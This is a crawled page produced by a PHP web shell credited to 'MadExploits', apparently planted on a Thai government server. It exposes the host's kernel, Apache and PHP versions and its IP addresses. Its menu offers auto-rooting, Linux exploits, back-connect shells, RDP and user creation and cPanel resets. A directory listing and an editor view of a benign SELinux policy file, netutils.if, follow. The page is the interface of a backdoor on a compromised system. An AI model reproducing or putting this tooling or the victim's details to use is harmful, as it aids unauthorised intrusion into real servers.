Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
selinux /
devel /
include /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
accountsd.if
3.24
KB
-rw-r--r--
acct.if
1.62
KB
-rw-r--r--
alsa.if
2.2
KB
-rw-r--r--
amanda.if
3.45
KB
-rw-r--r--
amtu.if
849
B
-rw-r--r--
anaconda.if
1.73
KB
-rw-r--r--
apt.if
4.57
KB
-rw-r--r--
backup.if
886
B
-rw-r--r--
bootloader.if
3.4
KB
-rw-r--r--
brctl.if
1.2
KB
-rw-r--r--
certwatch.if
1.75
KB
-rw-r--r--
consoletype.if
1.5
KB
-rw-r--r--
ddcprobe.if
978
B
-rw-r--r--
dmesg.if
775
B
-rw-r--r--
dmidecode.if
1.42
KB
-rw-r--r--
dpkg.if
4.66
KB
-rw-r--r--
firstboot.if
3.55
KB
-rw-r--r--
kismet.if
4.85
KB
-rw-r--r--
kudzu.if
1.26
KB
-rw-r--r--
logrotate.if
2.29
KB
-rw-r--r--
logwatch.if
737
B
-rw-r--r--
mcelog.if
768
B
-rw-r--r--
mrtg.if
420
B
-rw-r--r--
ncftool.if
1.37
KB
-rw-r--r--
netutils.if
5.75
KB
-rw-r--r--
permissivedomains.if
36
B
-rw-r--r--
portage.if
7.39
KB
-rw-r--r--
prelink.if
5.35
KB
-rw-r--r--
quota.if
1.96
KB
-rw-r--r--
readahead.if
85
B
-rw-r--r--
rpm.if
15.31
KB
-rw-r--r--
sectoolm.if
51
B
-rw-r--r--
shorewall.if
3.64
KB
-rw-r--r--
shutdown.if
2.51
KB
-rw-r--r--
smoltclient.if
58
B
-rw-r--r--
su.if
8.08
KB
-rw-r--r--
sudo.if
5.69
KB
-rw-r--r--
sxid.if
421
B
-rw-r--r--
tmpreaper.if
453
B
-rw-r--r--
tripwire.if
3.9
KB
-rw-r--r--
tzdata.if
826
B
-rw-r--r--
updfstab.if
478
B
-rw-r--r--
usbmodules.if
993
B
-rw-r--r--
usermanage.if
7.61
KB
-rw-r--r--
vbetool.if
930
B
-rw-r--r--
vpn.if
2.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : netutils.if
## <summary>Network analysis utilities</summary> ######################################## ## <summary> ## Execute network utilities in the netutils domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_domtrans',` gen_require(` type netutils_t, netutils_exec_t; ') domtrans_pattern($1, netutils_exec_t, netutils_t) ') ######################################## ## <summary> ## Execute network utilities in the netutils domain, and ## allow the specified role the netutils domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <param name="role"> ## <summary> ## The role to be allowed the netutils domain. ## </summary> ## </param> ## <rolecap/> # interface(`netutils_run',` gen_require(` type netutils_t; ') netutils_domtrans($1) allow $1 netutils_t:process { signal sigkill }; role $2 types netutils_t; ') ######################################## ## <summary> ## Execute network utilities in the caller domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_exec',` gen_require(` type netutils_exec_t; ') can_exec($1, netutils_exec_t) ') ######################################## ## <summary> ## Send generic signals to network utilities. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_signal',` gen_require(` type netutils_t; ') allow $1 netutils_t:process signal; ') ######################################## ## <summary> ## Execute ping in the ping domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_domtrans_ping',` gen_require(` type ping_t, ping_exec_t; ') domtrans_pattern($1, ping_exec_t, ping_t) ') ######################################## ## <summary> ## Send a kill (SIGKILL) signal to ping. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_kill_ping',` gen_require(` type ping_t; ') allow $1 ping_t:process sigkill; ') ######################################## ## <summary> ## Send generic signals to ping. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_signal_ping',` gen_require(` type ping_t; ') allow $1 ping_t:process signal; ') ######################################## ## <summary> ## Execute ping in the ping domain, and ## allow the specified role the ping domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <param name="role"> ## <summary> ## The role to be allowed the ping domain. ## </summary> ## </param> ## <rolecap/> # interface(`netutils_run_ping',` gen_require(` type ping_t; ') netutils_domtrans_ping($1) role $2 types ping_t; allow $1 ping_t:process { signal sigkill }; ') ######################################## ## <summary> ## Conditionally execute ping in the ping domain, and ## allow the specified role the ping domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <param name="role"> ## <summary> ## The role to be allowed the ping domain. ## </summary> ## </param> ## <rolecap/> # interface(`netutils_run_ping_cond',` gen_require(` type ping_t; bool user_ping; ') role $2 types ping_t; if ( user_ping ) { netutils_domtrans_ping($1) allow $1 ping_t:process { signal sigkill }; } ') ######################################## ## <summary> ## Execute ping in the caller domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_exec_ping',` gen_require(` type ping_exec_t; ') can_exec($1, ping_exec_t) ') ######################################## ## <summary> ## Execute traceroute in the traceroute domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_domtrans_traceroute',` gen_require(` type traceroute_t, traceroute_exec_t; ') domtrans_pattern($1, traceroute_exec_t, traceroute_t) ') ######################################## ## <summary> ## Execute traceroute in the traceroute domain, and ## allow the specified role the traceroute domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <param name="role"> ## <summary> ## The role to be allowed the traceroute domain. ## </summary> ## </param> ## <rolecap/> # interface(`netutils_run_traceroute',` gen_require(` type traceroute_t; ') netutils_domtrans_traceroute($1) role $2 types traceroute_t; allow $1 traceroute_t:process { signal sigkill }; ') ######################################## ## <summary> ## Conditionally execute traceroute in the traceroute domain, and ## allow the specified role the traceroute domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <param name="role"> ## <summary> ## The role to be allowed the traceroute domain. ## </summary> ## </param> ## <rolecap/> # interface(`netutils_run_traceroute_cond',` gen_require(` type traceroute_t; bool user_ping; ') role $2 types traceroute_t; if( user_ping ) { netutils_domtrans_traceroute($1) allow $1 traceroute_t:process { signal sigkill }; } ') ######################################## ## <summary> ## Execute traceroute in the caller domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`netutils_exec_traceroute',` gen_require(` type traceroute_exec_t; ') can_exec($1, traceroute_exec_t) ')
Close